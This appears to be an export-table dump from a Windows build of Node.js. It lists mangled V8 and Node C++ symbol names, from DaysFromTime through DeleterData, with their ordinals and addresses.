                                                                                                                                                                                                        ?DaysFromTime@DateCache@internal@v8@@SAH_J@Z48580x140705c60
                                                                                                                                                                                                        ?DaysFromYearMonth@DateCache@internal@v8@@QEAAHHH@Z48590x140a79980
                                                                                                                                                                                                        ?Dead@CommonOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ48600x140eb27a0
                                                                                                                                                                                                        ?Dead@MachineGraph@compiler@internal@v8@@QEAAPEAVNode@234@XZ48610x140ed4a10
                                                                                                                                                                                                        ?DeadValue@CommonOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4MachineRepresentation@34@@Z48620x140eb27b0
                                                                                                                                                                                                        ?DeadValue@DeadCodeElimination@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@W4MachineRepresentation@34@@Z48630x140fac710
                                                                                                                                                                                                        ?DebugBreak@CodeAssembler@compiler@internal@v8@@QEAAXXZ48640x140f1fe90
                                                                                                                                                                                                        ?DebugBreak@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@XZ48650x140f59cb0
                                                                                                                                                                                                        ?DebugBreak@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ48660x140eca640
                                                                                                                                                                                                        ?DebugBreak@OS@base@v8@@SAXXZ48670x140e5fdf0
                                                                                                                                                                                                        ?DebugBreak@RawMachineAssembler@compiler@internal@v8@@QEAAXXZ48680x14108cd40
                                                                                                                                                                                                        ?DebugBreak@TurboAssembler@internal@v8@@QEAAXXZ48690x1405039f0
                                                                                                                                                                                                        ?DebugCommand@ReasonEnum@Paused@API@Debugger@protocol@v8_inspector@@3PEBDEB48700x141ff9a48
                                                                                                                                                                                                        ?DebugName@CallInterfaceDescriptor@internal@v8@@QEBAPEBDXZ48710x140a83260
                                                                                                                                                                                                        ?Debugger@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@XZ48720x14091d980
                                                                                                                                                                                                        ?Debugger@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ48730x140f3bd40
                                                                                                                                                                                                        ?DecRef@CodeEntryStorage@internal@v8@@QEAAXPEAVCodeEntry@23@@Z48740x14074dbb0
                                                                                                                                                                                                        ?DecRef@WasmCode@wasm@internal@v8@@QEAA_NXZ48750x140483170
                                                                                                                                                                                                        ?DecRefOnDeadCode@WasmCode@wasm@internal@v8@@QEAA_NXZ48760x140483190
                                                                                                                                                                                                        ?DecRefOnLiveCode@WasmCode@wasm@internal@v8@@QEAAXXZ48770x1404831b0
                                                                                                                                                                                                        ?DecRefOnPotentiallyDeadCode@WasmCode@wasm@internal@v8@@AEAA_NXZ48780x140569610
                                                                                                                                                                                                        ?Declare@Parser@internal@v8@@AEAAXPEAVDeclaration@23@PEBVAstRawString@23@W4VariableKind@23@W4VariableMode@23@W4InitializationFlag@23@PEAVScope@23@PEA_NHH@Z48790x1407a4e90
                                                                                                                                                                                                        ?Declare@Scope@internal@v8@@AEAAPEAVVariable@23@PEAVZone@23@PEBVAstRawString@23@W4VariableMode@23@W4VariableKind@23@W4InitializationFlag@23@W4MaybeAssignedFlag@23@PEA_N@Z48800x1406eabd0
                                                                                                                                                                                                        ?DeclareAndBindVariable@Parser@internal@v8@@AEAAXPEAVVariableProxy@23@W4VariableKind@23@W4VariableMode@23@PEAVScope@23@PEA_NH@Z48810x1407a4f80
                                                                                                                                                                                                        ?DeclareArguments@DeclarationScope@internal@v8@@QEAAXPEAVAstValueFactory@23@@Z48820x140af3b90
                                                                                                                                                                                                        ?DeclareArrowFunctionFormalParameters@Parser@internal@v8@@AEAAXPEAUParserFormalParameters@23@PEAVExpression@23@AEBULocation@Scanner@23@@Z48830x1407a5000
                                                                                                                                                                                                        ?DeclareBoundVariable@Parser@internal@v8@@AEAAPEAVVariableProxy@23@PEBVAstRawString@23@W4VariableMode@23@H@Z48840x1407a5150
                                                                                                                                                                                                        ?DeclareBrandVariable@ClassScope@internal@v8@@QEAAPEAVVariable@23@PEAVAstValueFactory@23@W4IsStaticFlag@23@H@Z48850x140af3c20
                                                                                                                                                                                                        ?DeclareCatchVariableName@Parser@internal@v8@@AEAAPEAVVariable@23@PEAVScope@23@PEBVAstRawString@23@@Z48860x140774830
                                                                                                                                                                                                        ?DeclareCatchVariableName@Scope@internal@v8@@QEAAPEAVVariable@23@PEBVAstRawString@23@@Z48870x140af3d50
                                                                                                                                                                                                        ?DeclareClass@Parser@internal@v8@@AEAAPEAVStatement@23@PEBVAstRawString@23@PEAVExpression@23@PEAV?$ZoneList@PEBVAstRawString@internal@v8@@@23@HH@Z48880x1407a5240
                                                                                                                                                                                                        ?DeclareClassVariable@ClassScope@internal@v8@@QEAAPEAVVariable@23@PEAVAstValueFactory@23@PEBVAstRawString@23@H@Z48890x140af3db0
                                                                                                                                                                                                        ?DeclareClassVariable@Parser@internal@v8@@AEAAXPEAVClassScope@23@PEBVAstRawString@23@PEAUClassInfo@?$ParserBase@VParser@internal@v8@@@23@H@Z48900x1407a5370
                                                                                                                                                                                                        ?DeclareDefaultFunctionVariables@DeclarationScope@internal@v8@@QEAAXPEAVAstValueFactory@23@@Z48910x140af3e40
                                                                                                                                                                                                        ?DeclareDynamicGlobal@DeclarationScope@internal@v8@@QEAAPEAVVariable@23@PEBVAstRawString@23@W4VariableKind@23@PEAVScope@23@@Z48920x140af3fa0
                                                                                                                                                                                                        ?DeclareFormalParameters@Parser@internal@v8@@AEAAXPEAUParserFormalParameters@23@@Z48930x140774840
                                                                                                                                                                                                        ?DeclareFunction@Parser@internal@v8@@AEAAPEAVStatement@23@PEBVAstRawString@23@PEAVFunctionLiteral@23@W4VariableMode@23@W4VariableKind@23@HHPEAV?$ZoneList@PEBVAstRawString@internal@v8@@@23@@Z48940x1407a5410
                                                                                                                                                                                                        ?DeclareFunctionNameVar@Parser@internal@v8@@AEAAXPEBVAstRawString@23@W4FunctionSyntaxKind@23@PEAVDeclarationScope@23@@Z48950x1407a5600
                                                                                                                                                                                                        ?DeclareFunctionVar@DeclarationScope@internal@v8@@QEAAPEAVVariable@23@PEBVAstRawString@23@PEAVScope@23@@Z48960x140af3ff0
                                                                                                                                                                                                        ?DeclareGeneratorObjectVar@DeclarationScope@internal@v8@@QEAAPEAVVariable@23@PEBVAstRawString@23@@Z48970x140af4120
                                                                                                                                                                                                        ?DeclareHomeObjectVariable@Scope@internal@v8@@QEAAPEAVVariable@23@PEAVAstValueFactory@23@@Z48980x140af41b0
                                                                                                                                                                                                        ?DeclareIdentifier@Parser@internal@v8@@AEAAXPEBVAstRawString@23@H@Z48990x140774930
                                                                                                                                                                                                        ?DeclareLabel@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAAXPEAPEAV?$ZoneList@PEBVAstRawString@internal@v8@@@23@0PEBVAstRawString@23@@Z49000x140774940
                                                                                                                                                                                                        ?DeclareLocal@Scope@internal@v8@@QEAAPEAVVariable@23@PEBVAstRawString@23@W4VariableMode@23@W4VariableKind@23@PEA_NW4InitializationFlag@23@@Z49010x140af4220
                                                                                                                                                                                                        ?DeclareNative@Parser@internal@v8@@AEAAPEAVStatement@23@PEBVAstRawString@23@H@Z49020x1407a5640
                                                                                                                                                                                                        ?DeclareParameter@DeclarationScope@internal@v8@@QEAAPEAVVariable@23@PEBVAstRawString@23@W4VariableMode@23@_N2PEAVAstValueFactory@23@H@Z49030x140af42d0
                                                                                                                                                                                                        ?DeclarePrivateClassMember@Parser@internal@v8@@AEAAXPEAVClassScope@23@PEBVAstRawString@23@PEAVClassLiteralProperty@23@W4Kind@623@_NPEAUClassInfo@?$ParserBase@VParser@internal@v8@@@23@@Z49040x1407a5790
                                                                                                                                                                                                        ?DeclarePrivateName@ClassScope@internal@v8@@QEAAPEAVVariable@23@PEBVAstRawString@23@W4VariableMode@23@W4IsStaticFlag@23@PEA_N@Z49050x140af4460
                                                                                                                                                                                                        ?DeclarePublicClassField@Parser@internal@v8@@AEAAXPEAVClassScope@23@PEAVClassLiteralProperty@23@_N2PEAUClassInfo@?$ParserBase@VParser@internal@v8@@@23@@Z49060x1407a58a0
                                                                                                                                                                                                        ?DeclarePublicClassMethod@Parser@internal@v8@@AEAAXPEBVAstRawString@23@PEAVClassLiteralProperty@23@_NPEAUClassInfo@?$ParserBase@VParser@internal@v8@@@23@@Z49070x1407a59a0
                                                                                                                                                                                                        ?DeclareSloppyBlockFunction@DeclarationScope@internal@v8@@QEAAXPEAVSloppyBlockFunctionStatement@23@@Z49080x140af45f0
                                                                                                                                                                                                        ?DeclareStaticHomeObjectVariable@Scope@internal@v8@@QEAAPEAVVariable@23@PEAVAstValueFactory@23@@Z49090x140af4610
                                                                                                                                                                                                        ?DeclareThis@DeclarationScope@internal@v8@@QEAAXPEAVAstValueFactory@23@@Z49100x140af4680
                                                                                                                                                                                                        ?DeclareUnboundVariable@Parser@internal@v8@@AEAAXPEBVAstRawString@23@W4VariableMode@23@W4InitializationFlag@23@H@Z49110x1407a5a20
                                                                                                                                                                                                        ?DeclareVariable@Parser@internal@v8@@AEAAPEAVVariable@23@PEBVAstRawString@23@W4VariableKind@23@W4VariableMode@23@W4InitializationFlag@23@PEAVScope@23@PEA_NHH@Z49120x1407a5a70
                                                                                                                                                                                                        ?DeclareVariable@Scope@internal@v8@@QEAAPEAVVariable@23@PEAVDeclaration@23@PEBVAstRawString@23@HW4VariableMode@23@W4VariableKind@23@W4InitializationFlag@23@PEA_N55@Z49130x140af4740
                                                                                                                                                                                                        ?DeclareVariableName@Scope@internal@v8@@QEAAPEAVVariable@23@PEBVAstRawString@23@W4VariableMode@23@PEA_NW4VariableKind@23@@Z49140x140af48d0
                                                                                                                                                                                                        ?Decode@BytecodeDecoder@interpreter@internal@v8@@SAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV56@PEBEH@Z49150x14090fc60
                                                                                                                                                                                                        ?Decode@Disassembler@internal@v8@@SAHPEAVIsolate@23@AEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@PEAE2VCodeReference@23@_K@Z49160x140a42270
                                                                                                                                                                                                        ?DecodeBytes@node@@YA_JPEAVIsolate@v8@@V?$Local@VValue@v8@@@3@W4encoding@1@@Z49170x14028e350
                                                                                                                                                                                                        ?DecodeCustomSections@wasm@internal@v8@@YA?AV?$vector@UCustomSectionOffset@wasm@internal@v8@@V?$allocator@UCustomSectionOffset@wasm@internal@v8@@@std@@@std@@PEBE0@Z49180x140587120
                                                                                                                                                                                                        ?DecodeExternalPointerImpl@internal@v8@@YA_KPEBVIsolate@12@_KW4ExternalPointerTag@12@@Z49190x140078920
                                                                                                                                                                                                        ?DecodeI32ExceptionValue@internal@v8@@YAXV?$Handle@VFixedArray@internal@v8@@@12@PEAI1@Z49200x14052f190
                                                                                                                                                                                                        ?DecodeI64ExceptionValue@internal@v8@@YAXV?$Handle@VFixedArray@internal@v8@@@12@PEAIPEA_K@Z49210x14052f1f0
                                                                                                                                                                                                        ?DecodeLocalDecls@wasm@internal@v8@@YA_NAEBVWasmFeatures@123@PEAUBodyLocalDecls@123@PEBUWasmModule@123@PEBE3@Z49220x1405cbbf0
                                                                                                                                                                                                        ?DecodeMapping@WasmModuleSourceMap@wasm@internal@v8@@AEAA_NAEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z49230x14053c220
                                                                                                                                                                                                        ?DecodeRegisterListOperand@BytecodeDecoder@interpreter@internal@v8@@SA?AVRegisterList@234@_KIW4OperandType@234@W4OperandScale@234@@Z49240x140910df0
                                                                                                                                                                                                        ?DecodeRegisterOperand@BytecodeDecoder@interpreter@internal@v8@@SA?AVRegister@234@_KW4OperandType@234@W4OperandScale@234@@Z49250x140910e70
                                                                                                                                                                                                        ?DecodeSLeb128@EhFrameIterator@internal@v8@@CAHPEBEPEAH@Z49260x140a40690
                                                                                                                                                                                                        ?DecodeSignedOperand@BytecodeDecoder@interpreter@internal@v8@@SAH_KW4OperandType@234@W4OperandScale@234@@Z49270x140910f10
                                                                                                                                                                                                        ?DecodeULeb128@EhFrameIterator@internal@v8@@CAIPEBEPEAH@Z49280x140a406f0
                                                                                                                                                                                                        ?DecodeUnsignedOperand@BytecodeDecoder@interpreter@internal@v8@@SAI_KW4OperandType@234@W4OperandScale@234@@Z49290x140910f70
                                                                                                                                                                                                        ?DecodeWasmFunctionForTesting@wasm@internal@v8@@YA?AV?$Result@V?$unique_ptr@UWasmFunction@wasm@internal@v8@@U?$default_delete@UWasmFunction@wasm@internal@v8@@@std@@@std@@@123@AEBVWasmFeatures@123@PEAVZone@23@AEBUModuleWireBytes@123@PEBUWasmModule@123@PEBE4PEAVCounters@23@@Z49300x14058ce20
                                                                                                                                                                                                        ?DecodeWasmInitExprForTesting@wasm@internal@v8@@YA?AVWireBytesRef@123@AEBVWasmFeatures@123@PEBE1VValueType@123@@Z49310x14058d0b0
                                                                                                                                                                                                        ?DecodeWasmModule@wasm@internal@v8@@YA?AV?$Result@V?$shared_ptr@UWasmModule@wasm@internal@v8@@@std@@@123@AEBVWasmFeatures@123@PEBE1_NW4ModuleOrigin@123@PEAVCounters@23@V?$shared_ptr@VRecorder@metrics@internal@v8@@@std@@VContextId@Recorder@metrics@3@W4DecodingMethod@123@PEAVAccountingAllocator@23@@Z49320x14058d1d0
                                                                                                                                                                                                        ?DecodeWasmSignatureForTesting@wasm@internal@v8@@YAPEBV?$Signature@VValueType@wasm@internal@v8@@@23@AEBVWasmFeatures@123@PEAVZone@23@PEBE2@Z49330x14058d700
                                                                                                                                                                                                        ?DecodeWrite@node@@YA_JPEAVIsolate@v8@@PEAD_KV?$Local@VValue@v8@@@3@W4encoding@1@@Z49340x14028e3c0
                                                                                                                                                                                                        ?Decommit@WasmCodeManager@wasm@internal@v8@@AEAAXVAddressRegion@base@4@@Z49350x140569650
                                                                                                                                                                                                        ?Decompress@SnapshotCompression@internal@v8@@SA?AVSnapshotData@23@V?$Vector@$$CBE@base@3@@Z49360x1406c4ae0
                                                                                                                                                                                                        ?DecompressAnyTagged@TurboAssembler@internal@v8@@QEAAXVRegister@23@VOperand@23@@Z49370x140503a00
                                                                                                                                                                                                        ?DecompressTaggedPointer@TurboAssembler@internal@v8@@QEAAXVRegister@23@0@Z49380x140503a60
                                                                                                                                                                                                        ?DecompressTaggedPointer@TurboAssembler@internal@v8@@QEAAXVRegister@23@VOperand@23@@Z49390x140503a00
                                                                                                                                                                                                        ?DecompressTaggedSigned@TurboAssembler@internal@v8@@QEAAXVRegister@23@VOperand@23@@Z49400x1404e26f0
                                                                                                                                                                                                        ?Decorate@Graph@compiler@internal@v8@@QEAAXPEAVNode@234@@Z49410x140f543f0
                                                                                                                                                                                                        ?DecreaseAllocatedBytes@PagedSpace@internal@v8@@QEAAX_KPEAVPage@23@@Z49420x1404831c0
                                                                                                                                                                                                        ?DecreaseAllocatedSize@EmbedderHeapTracer@v8@@QEAAX_K@Z49430x140b0f530
                                                                                                                                                                                                        ?DecreaseAllocatedSize@LocalEmbedderHeapTracer@internal@v8@@QEAAX_K@Z49440x140952c10
                                                                                                                                                                                                        ?DecreaseCapacity@PagedSpace@internal@v8@@QEAAX_K@Z49450x1404831d0
                                                                                                                                                                                                        ?DecreaseLimit@PagedSpace@internal@v8@@AEAAX_K@Z49460x1409647c0
                                                                                                                                                                                                        ?Decrement@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@@Z49470x140f3bd50
                                                                                                                                                                                                        ?Decrement@StatsCounterThreadSafe@internal@v8@@QEAAXH@Z49480x1408dcac0
                                                                                                                                                                                                        ?Decrement@StatsCounterThreadSafe@internal@v8@@QEAAXXZ49490x1408dcb10
                                                                                                                                                                                                        ?DecrementCounter@MacroAssembler@internal@v8@@QEAAXPEAVStatsCounter@23@H@Z49500x14049b930
                                                                                                                                                                                                        ?DecrementDiscardedMemory@StatsCollector@internal@cppgc@@QEAAX_K@Z49510x140455930
                                                                                                                                                                                                        ?DecrementExternalBackingStoreBytes@Space@internal@v8@@QEAAXW4ExternalBackingStoreType@23@_K@Z49520x1404831e0
                                                                                                                                                                                                        ?DecrementMicrotasksScopeDepth@MicrotaskQueue@internal@v8@@QEAAXXZ49530x140483210
                                                                                                                                                                                                        ?DecrementMicrotasksSuppressions@MicrotaskQueue@internal@v8@@QEAAXXZ49540x140483220
                                                                                                                                                                                                        ?DecrementRefCount@WasmCode@wasm@internal@v8@@SAXV?$Vector@QEAVWasmCode@wasm@internal@v8@@@base@4@@Z49550x1405696f0
                                                                                                                                                                                                        ?DecrementTracingIndentation@JSHeapBroker@compiler@internal@v8@@QEAAXXZ49560x140f2e790
                                                                                                                                                                                                        ?DecrementUnscheduledUseCount@Scheduler@compiler@internal@v8@@AEAAXPEAVNode@234@0@Z49570x141051550
                                                                                                                                                                                                        ?Default@AssemblerOptions@internal@v8@@SA?AU123@PEAVIsolate@23@@Z49580x140ab4220
                                                                                                                                                                                                        ?Default@MeasureMemoryDelegate@v8@@SA?AV?$unique_ptr@VMeasureMemoryDelegate@v8@@U?$default_delete@VMeasureMemoryDelegate@v8@@@std@@@std@@PEAVIsolate@2@V?$Local@VContext@v8@@@2@V?$Local@VResolver@Promise@v8@@@2@W4MeasureMemoryMode@2@@Z49590x140b0f550
                                                                                                                                                                                                        ?Default@RegisterConfiguration@internal@v8@@SAPEBV123@XZ49600x140a81510
                                                                                                                                                                                                        ?DefaultConstructor@Parser@internal@v8@@AEAAPEAVFunctionLiteral@23@PEBVAstRawString@23@_NHH@Z49610x1407a5b80
                                                                                                                                                                                                        ?DefaultForOffHeapTrampoline@AssemblerOptions@internal@v8@@SA?AU123@PEAVIsolate@23@@Z49620x140ab42a0
                                                                                                                                                                                                        ?DefaultJSRegisterArray@CallInterfaceDescriptor@internal@v8@@KA?AV?$array@VRegister@internal@v8@@$03@std@@XZ49630x140503aa0
                                                                                                                                                                                                        ?DefaultLowering@Int64Lowering@compiler@internal@v8@@AEAA_NPEAVNode@234@_N@Z49640x140f68620
                                                                                                                                                                                                        ?DefaultProcessExitHandler@node@@YAXPEAVEnvironment@1@H@Z49650x14028c6e0
                                                                                                                                                                                                        ?DefaultRegisterArray@CallInterfaceDescriptor@internal@v8@@KA@XZ49660x140503ae0
                                                                                                                                                                                                        ?DefaultRepresentation@InstructionSequence@compiler@internal@v8@@SA?AW4MachineRepresentation@34@XZ49670x1404bb890
                                                                                                                                                                                                        ?DefaultSchedulerData@Scheduler@compiler@internal@v8@@AEAA?AUSchedulerData@1234@XZ49680x1410516f0
                                                                                                                                                                                                        ?DeferTraceToMutatorThreadIfConcurrent@ConcurrentMarkingVisitor@internal@cppgc@@MEAA_NPEBXP6AXPEAVVisitor@3@0@Z_K@Z49690x14045a1f0
                                                                                                                                                                                                        ?DeferTraceToMutatorThreadIfConcurrent@ConcurrentUnifiedHeapMarkingVisitor@internal@v8@@MEAA_NPEBXP6AXPEAVVisitor@cppgc@@0@Z_K@Z49700x14045a1f0
                                                                                                                                                                                                        ?DeferTraceToMutatorThreadIfConcurrent@Visitor@cppgc@@UEAA_NPEBXP6AXPEAV12@0@Z_K@Z49710x14007a0b0
                                                                                                                                                                                                        ?DefineAccessor@JSObject@internal@v8@@SA?AV?$MaybeHandle@VObject@internal@v8@@@23@V?$Handle@VJSObject@internal@v8@@@23@V?$Handle@VName@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@2W4PropertyAttributes@23@@Z49720x140833040
                                                                                                                                                                                                        ?DefineDeoptimizationLiteral@CodeGenerator@compiler@internal@v8@@AEAAHVDeoptimizationLiteral@234@@Z49730x140ee7550
                                                                                                                                                                                                        ?DefineOwnProperty@Object@v8@@QEAA?AV?$Maybe@_N@2@V?$Local@VContext@v8@@@2@V?$Local@VName@v8@@@2@V?$Local@VValue@v8@@@2@W4PropertyAttribute@2@@Z49740x140b0f610
                                                                                                                                                                                                        ?DefineProperty@Object@v8@@QEAA?AV?$Maybe@_N@2@V?$Local@VContext@v8@@@2@V?$Local@VName@v8@@@2@AEAVPropertyDescriptor@2@@Z49750x140b0f8c0
                                                                                                                                                                                                        ?DefinePropertyOrElementIgnoreAttributes@JSObject@internal@v8@@SA?AV?$MaybeHandle@VObject@internal@v8@@@23@V?$Handle@VJSObject@internal@v8@@@23@V?$Handle@VName@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@W4PropertyAttributes@23@@Z49760x140833f20
                                                                                                                                                                                                        ?Deinit@Isolate@internal@v8@@AEAAXXZ49770x140a0f2c0
                                                                                                                                                                                                        ?Delay@Recorder@metrics@internal@v8@@AEAAX$$QEAV?$unique_ptr@VDelayedEventBase@Recorder@metrics@internal@v8@@U?$default_delete@VDelayedEventBase@Recorder@metrics@internal@v8@@@std@@@std@@@Z49780x1408d09d0
                                                                                                                                                                                                        ?DelayedStringConstant@CommonOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@PEBVStringConstantBase@34@@Z49790x140eb2850
                                                                                                                                                                                                        ?Delete@?$OrderedHashTable@VOrderedHashMap@internal@v8@@$01@internal@v8@@SA_NPEAVIsolate@23@VOrderedHashMap@23@VObject@23@@Z49800x1407e3ba0
                                                                                                                                                                                                        ?Delete@?$OrderedHashTable@VOrderedHashSet@internal@v8@@$00@internal@v8@@SA_NPEAVIsolate@23@VOrderedHashSet@23@VObject@23@@Z49810x1407e3d30
                                                                                                                                                                                                        ?Delete@?$OrderedHashTable@VOrderedNameDictionary@internal@v8@@$02@internal@v8@@SA_NPEAVIsolate@23@VOrderedNameDictionary@23@VObject@23@@Z49820x1407e3ea0
                                                                                                                                                                                                        ?Delete@?$OrderedHashTableHandler@VSmallOrderedHashMap@internal@v8@@VOrderedHashMap@23@@internal@v8@@SA_NPEAVIsolate@23@V?$Handle@VHeapObject@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@@Z49830x1407e4080
                                                                                                                                                                                                        ?Delete@?$OrderedHashTableHandler@VSmallOrderedHashSet@internal@v8@@VOrderedHashSet@23@@internal@v8@@SA_NPEAVIsolate@23@V?$Handle@VHeapObject@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@@Z49840x1407e40b0
                                                                                                                                                                                                        ?Delete@?$OrderedHashTableHandler@VSmallOrderedNameDictionary@internal@v8@@VOrderedNameDictionary@23@@internal@v8@@SA_NPEAVIsolate@23@V?$Handle@VHeapObject@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@@Z49850x1407e40e0
                                                                                                                                                                                                        ?Delete@?$SmallOrderedHashTable@VSmallOrderedHashMap@internal@v8@@@internal@v8@@SA_NPEAVIsolate@23@VSmallOrderedHashMap@23@VObject@23@@Z49860x1407e4270
                                                                                                                                                                                                        ?Delete@?$SmallOrderedHashTable@VSmallOrderedHashSet@internal@v8@@@internal@v8@@SA_NPEAVIsolate@23@VSmallOrderedHashSet@23@VObject@23@@Z49870x1407e4450
                                                                                                                                                                                                        ?Delete@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@VRegister@234@W4LanguageMode@34@@Z49880x14091da80
                                                                                                                                                                                                        ?Delete@CpuProfile@v8@@QEAAXXZ49890x140b0fa30
                                                                                                                                                                                                        ?Delete@HeapSnapshot@v8@@QEAAXXZ49900x140b0fa40
                                                                                                                                                                                                        ?Delete@Isolate@internal@v8@@SAXPEAV123@@Z49910x140a0f720
                                                                                                                                                                                                        ?Delete@LookupIterator@internal@v8@@QEAAXXZ49920x14081c030
                                                                                                                                                                                                        ?Delete@Map@v8@@QEAA?AV?$Maybe@_N@2@V?$Local@VContext@v8@@@2@V?$Local@VValue@v8@@@2@@Z49930x140b0fab0
                                                                                                                                                                                                        ?Delete@Object@v8@@QEAA?AV?$Maybe@_N@2@V?$Local@VContext@v8@@@2@I@Z49940x140b0fcb0
                                                                                                                                                                                                        ?Delete@Object@v8@@QEAA?AV?$Maybe@_N@2@V?$Local@VContext@v8@@@2@V?$Local@VValue@v8@@@2@@Z49950x140b0fe30
                                                                                                                                                                                                        ?Delete@Set@v8@@QEAA?AV?$Maybe@_N@2@V?$Local@VContext@v8@@@2@V?$Local@VValue@v8@@@2@@Z49960x140b100b0
                                                                                                                                                                                                        ?Delete@SmallOrderedHashMap@internal@v8@@SA_NPEAVIsolate@23@V123@VObject@23@@Z49970x1407e45d0
                                                                                                                                                                                                        ?Delete@SmallOrderedHashSet@internal@v8@@SA_NPEAVIsolate@23@V123@VObject@23@@Z49980x1407e45e0
                                                                                                                                                                                                        ?Delete@WeakMap@debug@v8@@QEAA?AV?$Maybe@_N@3@V?$Local@VContext@v8@@@3@V?$Local@VValue@v8@@@3@@Z49990x140a6e820
                                                                                                                                                                                                        ?DeleteAll@Zone@internal@v8@@AEAAXXZ50000x1406abcc0
                                                                                                                                                                                                        ?DeleteAllHeapSnapshots@HeapProfiler@v8@@QEAAXXZ50010x140b102b0
                                                                                                                                                                                                        ?DeleteAllProfiles@CpuProfiler@internal@v8@@QEAAXXZ50020x140761640
                                                                                                                                                                                                        ?DeleteCodeAfter@WasmFunctionBuilder@wasm@internal@v8@@QEAAX_K@Z50030x14053fea0
                                                                                                                                                                                                        ?DeleteCompileJobsOnContext@WasmEngine@wasm@internal@v8@@QEAAXV?$Handle@VContext@internal@v8@@@34@@Z50040x140555c00
                                                                                                                                                                                                        ?DeleteCompileJobsOnIsolate@WasmEngine@wasm@internal@v8@@QEAAXPEAVIsolate@34@@Z50050x140555e60
                                                                                                                                                                                                        ?DeleteEntry@?$Dictionary@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VGlobalDictionary@internal@v8@@@23@PEAVIsolate@23@V423@VInternalIndex@23@@Z50060x1407f6140
                                                                                                                                                                                                        ?DeleteEntry@?$Dictionary@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VNameDictionary@internal@v8@@@23@PEAVIsolate@23@V423@VInternalIndex@23@@Z50070x1407f6260
                                                                                                                                                                                                        ?DeleteEntry@?$Dictionary@VNumberDictionary@internal@v8@@VNumberDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VNumberDictionary@internal@v8@@@23@PEAVIsolate@23@V423@VInternalIndex@23@@Z50080x1407f62e0
                                                                                                                                                                                                        ?DeleteEntry@?$Dictionary@VSimpleNumberDictionary@internal@v8@@VSimpleNumberDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VSimpleNumberDictionary@internal@v8@@@23@PEAVIsolate@23@V423@VInternalIndex@23@@Z50090x1407f6360
                                                                                                                                                                                                        ?DeleteEntry@IdentityMapBase@internal@v8@@IEAA_N_KPEA_K@Z50100x1406b43e0
                                                                                                                                                                                                        ?DeleteEntry@OrderedNameDictionary@internal@v8@@SA?AV?$Handle@VOrderedNameDictionary@internal@v8@@@23@PEAVIsolate@23@V423@VInternalIndex@23@@Z50110x1407e45f0
                                                                                                                                                                                                        ?DeleteEntry@OrderedNameDictionaryHandler@internal@v8@@SA?AV?$Handle@VHeapObject@internal@v8@@@23@PEAVIsolate@23@V423@VInternalIndex@23@@Z50120x1407e47d0
                                                                                                                                                                                                        ?DeleteEntry@SmallOrderedNameDictionary@internal@v8@@SA?AV?$Handle@VSmallOrderedNameDictionary@internal@v8@@@23@PEAVIsolate@23@V423@VInternalIndex@23@@Z50130x1407e4820
                                                                                                                                                                                                        ?DeleteEntry@SwissNameDictionary@internal@v8@@SA?AV?$Handle@VSwissNameDictionary@internal@v8@@@23@PEAVIsolate@23@V423@VInternalIndex@23@@Z50140x1407c0e80
                                                                                                                                                                                                        ?DeleteExtensions@HandleScope@internal@v8@@SAXPEAVIsolate@23@@Z50150x1409f46a0
                                                                                                                                                                                                        ?DeleteIndex@IdentityMapBase@internal@v8@@AEAA_NHPEA_K@Z50160x1406b4440
                                                                                                                                                                                                        ?DeleteObjectProperty@Runtime@internal@v8@@SA?AV?$Maybe@_N@3@PEAVIsolate@23@V?$Handle@VJSReceiver@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@W4LanguageMode@23@@Z50170x1406fac90
                                                                                                                                                                                                        ?DeletePrivate@Object@v8@@QEAA?AV?$Maybe@_N@2@V?$Local@VContext@v8@@@2@V?$Local@VPrivate@v8@@@2@@Z50180x140b102c0
                                                                                                                                                                                                        ?DeleteProfile@CpuProfiler@internal@v8@@QEAAXPEAVCpuProfile@23@@Z50190x140761670
                                                                                                                                                                                                        ?DeleteProperty@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ50200x140f3be10
                                                                                                                                                                                                        ?DeleteProperty@JSReceiver@internal@v8@@SA?AV?$Maybe@_N@3@V?$Handle@VJSReceiver@internal@v8@@@23@V?$Handle@VName@internal@v8@@@23@W4LanguageMode@23@@Z50210x140834a60
                                                                                                                                                                                                        ?DeletePropertyOrElement@JSReceiver@internal@v8@@SA?AV?$Maybe@_N@3@V?$Handle@VJSReceiver@internal@v8@@@23@V?$Handle@VName@internal@v8@@@23@W4LanguageMode@23@@Z50220x140834ae0
                                                                                                                                                                                                        ?DeleteThreadLocalKey@Thread@base@v8@@SAXH@Z50230x140e5fe00
                                                                                                                                                                                                        ?DeleteUnresolved@Scope@internal@v8@@QEAAXPEAVVariableProxy@23@@Z50240x140af4980
                                                                                                                                                                                                        ?Deleter@Contents@ArrayBuffer@v8@@QEBAP6AXPEAX_K0@ZXZ50250x140078d60
                                                                                                                                                                                                        ?Deleter@Contents@SharedArrayBuffer@v8@@QEBAP6AXPEAX_K0@ZXZ50260x140078d60
                                                                                                                                                                                                        ?DeleterData@Contents@ArrayBuffer@v8@@QEBAPEAXXZ50270x140078d70
                                                                                                                                                                                                        ?DeleterData@Contents@SharedArrayBuffer@v8@@QEBAPEAXXZ50280x140078d70
